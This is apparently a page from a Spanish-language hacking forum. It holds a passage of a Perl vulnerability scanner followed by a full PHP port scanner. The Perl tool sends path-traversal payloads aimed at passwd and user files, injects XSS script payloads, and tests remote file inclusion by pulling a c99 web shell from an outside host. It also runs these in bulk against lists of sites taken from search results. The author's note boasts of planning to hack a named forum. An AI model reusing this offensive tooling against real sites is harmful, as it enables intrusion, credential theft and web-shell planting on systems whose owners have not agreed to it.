            '../../etc/security/passwd',
            '../../../etc/security/passwd',
            '../../../../etc/security/passwd',
            '../../../../../etc/security/passwd',
            '../../../../../../etc/security/passwd',
            '../../../../../../../etc/security/passwd',
            '../../../../../../../../etc/security/passwd',
            '../../../../../../../../../etc/security/passwd',
            '../../../../../../../../../../etc/security/passwd',
            '../../../../../../../../../../../etc/security/passwd',
            '../../../../../../../../../../../../etc/security/passwd',
            '../../../../../../../../../../../../../etc/security/passwd',
            '../../../../../../../../../../../../../../etc/security/passwd',
            '../etc/security/user',
            '../../etc/security/user',
            '../../../etc/security/user',
            '../../../../etc/security/user',
            '../../../../../etc/security/user',
            '../../../../../../etc/security/user',
            '../../../../../../../etc/security/user',
            '../../../../../../../../etc/security/user',
            '../../../../../../../../../etc/security/user',
            '../../../../../../../../../../etc/security/user',
            '../../../../../../../../../../../etc/security/user',
            '../../../../../../../../../../../../etc/security/user',
            '../../../../../../../../../../../../../etc/security/user'
            );
foreach $scan(@devil)
{

$run=$lfi.$scan;

print "Probando con $scan\n";

$request =HTTP::Request->new(GET=>$run);
$agent= LWP::UserAgent->new();
$response=$agent->request($request);
if($response->is_success && $response->content =~/root:x:/){

print "\n\n";
print "$lfi = Vulnerable\n";



}
}
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;

}


sub xss {

system ("cls");
print "\n\n";
print "Escribe la web a explotar con XSS::";
$xssans = <STDIN>;
chomp $xssans;
print "\n\n";

print "Objectivo = $xssans\n\n";
      
$xsscode='>"<script>alert("Guason")</script><div style="1';
                  $xss=$xssans.$xsscode;
                     $agent=LWP::UserAgent->new();
                        $req=$agent->get("$xss");
                        if($req->is_success && $req->content=~/Guason/){
print "\n\n";
print "$xssans es Vulnerable\n\n";

} else {
print "\n\n";
print "No es vulnerable\n\n";
}


syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;

}


sub rfi {

system ("cls");
print  "\n\n";
print "Url de la web a explotar con RFI::";
$rfi = <STDIN>;
chomp $rfi;
print "\n\n";

print "Objectivo  = $rfi\n\n";


$rficode="[url]http://younes.by.ru/c99.txt[/url]";
               $rfid=$rfi.$rficode;
               $request =HTTP::Request->new(GET=>$rfid);
               $agent= LWP::UserAgent->new();
               $response=$agent->request($request);
               if($response->is_success && $response->content =~/c99/){

print "\n\n";
print "Es vulnerable !\n";


}  else {
print "\n\n";
print "No es vulnerable\n\n";
}



syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;


}

################################LFI_M is obsolete ########################################33


sub m_lfi {



print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;


}


sub m_xss {

print "\n\n";
print "Url de los googles para XSS:";
$xss= <STDIN>;
chomp $xss;


open ( M_XSS , ">>c:/m_xss.txt" ) ;
print M_XSS "Extrayendo vulnerabilidades XSS de $xss\n\n";

open ( HOLA , $xss ) ;
@googles = <HOLA>;
close HOLA;

foreach $xsss(@googles){

$xsscode='>"<script>alert("Guason")</script><div style="1';
$xss=$xsss.$xsscode;
                     $agent=LWP::UserAgent->new();
                        $req=$agent->get("$xss");
if($req->is_success && $req->content=~/Guason/){

print "$xsss = Yes!\n";
print M_XSS "$xsss = Yes!\n";
} else {

print "$xsss = No!\n";
print M_XSS  "$xsss = No!\n";
}

}
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;


}


sub m_rfi {

print "\n\n";
print "Url de los googles para RFI:";
$rfi= <STDIN>;
chomp $rfi;


open ( M_RFI , ">>c:/m_rfi.txt") ;
print M_RFI "Extrayendo vulnerabilidades RFI de $rfi\n\n";

open ( HOLA , $rfi ) ;
@googles = <HOLA>;
close HOLA;



foreach $rfis(@googles) {

$rficode="[url]http://younes.by.ru/c99.txt[/url]";
               $rfid=$rfis.$rficode;
               $request =HTTP::Request->new(GET=>$rfid);
               $agent= LWP::UserAgent->new();
               $response=$agent->request($request);
               if($response->is_success && $response->content =~/c99/){

print "$rfis = Es vulnerable\n";
print M_RFI "$rfis = Es vulnerable\n";

} else {

print "$rfis = No es vulnerable\n";
print M_RFI "$rfis = No es vulnerable\n";

}


}
print "\n";
syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;


}



sub about {
system ("cls");
print q (

@@@@@@@@@@@@@@@@@@@@@@@@@*@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@   *@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@*  ***@*@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@***@@@@@*@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@**@@@@@@@@*@@@@@@@@@@@@
@@@@@@@@@@@@@@@ *@@@@@@@@@@ @@@@@@@@@@@@
@@@@@@@@@@@@@@@**@@@@@@@@@@**@@@@@@@@@@@
@@@@@@@@@@@@@@@@ @@@@@@@@@@@**@@@@@@@@@@
@@@@@@@@@@@@@@@@**@@@@@@@@@@@**@@@@@@@@@
@@@@@@@@@@@@@@@@@ @@@@@@*****@@@@@@@@@@@
@@@@@@@@@@@@@@@@@**@@@@*@@@* @@@@@@@@@@@
@@@@@@@@@@@@@@@@@@ @@@@*@@@@**@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@*@@@*@@@@   @@@@@@@@@
@@@@@@@@@@@@@@@@@@@*@** *@@    @@@@@@@@@
@@@@@@@@@@@@@@@@@@@*            @@@@@@@@
@@@@@@@@@@@@@@@@@@@             @@@@@@@@
@@@@@@@@@@@@@@@@@@@             @@@@@@@@
@@@@@@@@@@@@@@@@@@@@         *@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@       *@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@           @@@@@@@@@@@
@@@@@@@@@@@@@@@@**@@@*@   *@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@ @@@@@@    @@@@@@@@@@@@@
@@@@@@@@@@@@@@@* *@@@@@ @@*@@@@  @@@@@@@
@@@@@@@@@@@@@@@   *@@@@@@@@@@@@   @@@@@@
@@@@@@@@@@@@@@@    @*@@@@@@@@@    @@@@@@
@@@@@@@@@@@@@@@     @@@@@@@@@@    *@@@@@
@@@@@@@@@@@@@@@     @@@@@@@@@@*   @@@@@@
@@@@@@@@@@@@@@@       @@@@@@@@@   @@@@@@
@@@@@@@@@@@@@@@       *@@@@@@@@  *@@@@@@
@@@@@@@@@@@@@@        @@@@@@@@@  *@@@@@@
@@@@@@@@@@@@@@  @ *  *@@@@@@@@@  *@@@@@@
@@@@@@@@@@@@****@ *@@@@@@@@@@@* ***@@@@@
@@@@@@@@@@@****@@**@@@@@@@@@@@ *@ **@@@@
@@@@@@@@@@**@* @@**@@@@@@@@@@@**@***@@@@
@@@@@@@@@@*@@ *@@*@@@@@@@@@@@@@*@**@@@@@
@@@@@@@@@@@@* *@*@@@@@@@**@@@@@*** **@@@
@@@@@@@@@@*@* ****@@@@@@ *@@@@* @@* *@@@
@@@@@@@@@@ @**@@*  @@@@******  @@@@**@@@
@@@@@@@@@@***@@@@      *@*     @@@@@@@@@
@@@@@@@@@@@ @@@@@*   *@@@@@@  *@@@@@@@@@
@@@@@@@@@@@@@@@@@    @@@@@@@  *@@@@@@@@@
@@@@@@@@@@@@@@@@@** *@@@@@@* **@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@*@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@@@@@*@@@@@@@@@@@@@@@@@@@@
@@@@@@@@@@@@@@@***@*@@@@@@@@@***@@@@@@@@

   Este programa fue escrito por Guason = me
   Este lo realice en dos fases uno  Viendo porno y otro jugando al mithlogy titans 
   Este ayuda a verificar vulnerabiliades de una web o de un archivo entero lo que me es
   mucho mas comodo .......
   Simplemente no mando saludos a nadie mmm talvez a explorer de perlenespañol y a soulnet
   los demas por mi mueranse  y pronto voy a hackear el-hacker.net muaaaaaaaaa ajajajajajajaja
  ajajajajajajajajajaj  ajajajajajajajajajaj  ajajajajajajajajajaj  ajajajajajajajajajaj  ajajajajajajajajajaj
   Tambien  mando saludos a los moderadores de el-hacker quienes piensan que se han desazido de      mi baneandome pero NO! porque todavia estoy ahi y me meto en sus narices

     Ja! Pero que malo que soy !

   
  Mis datos =
   
  nOMBRE = Salchichon
  Emal = [email protected]
  Web = [url]http://guason-cracker.blogspot.com/[/url]

);


print "\n";

syswrite STDOUT, "Presiona enter para volver al menu principal\n";
<STDIN>;
system ("cls");
goto menu;
}

sub salir {
print "\n\n";
print "Good Bye\n\n\n";
exit 1;
}


Good Bye y suerte a todos

20
Bugs y Exploits / Port Scaner By _84kur10_ & JxE-13
« en: Febrero 25, 2010, 11:41:51 am »
Código: You are not allowed to view links. Register or Login
<?php

define
(NAMEFILE,"ports.html");
if (
$argv[1]==NULL)
{
print 
"
###########     Port Scaner    By _84kur10_ , JxE-13  ##############
#                                                                  #
#        Escaner de puertos                                        #
#        Busca ports open                                       #
#==================================================================#
#  Usage: php Scan.php ip initport eofport                         #
#  [email protected] Black Team, LatinoHackTeam, Ro0T-MaFia                 #
####################################################################\n\n"
;
die;
}
$init=(int)$argv[2];
$eof =(int)$argv[3];
$ip  =$argv[1];
function 
savePort($info)
{
$fp fopen(NAMEFILE,"ab+");
fwrite($fp,$info."<br>");
fclose($fp);
}
savePort("<br><h1>Resultado de escan para ".$ip."</h1><br>");
savePort("c0ded by _84kur10_, JxE-13 <br>");
print 
"Scaneando...\n";

for (
$i=$init;$i<=$eof;$i++){
$conect=fsockopen($ip$i,$errno$errstr30);
if(
false==$conect)
{
print  
"\nPuerto ".$i." No encontrado\n";
}
else
{
$info"\n\nPuerto ".$i." Fue encontrado Abierto\n";
savePort($info);
print 
$info;
}
}

?>

Páginas: [1] 2 3 4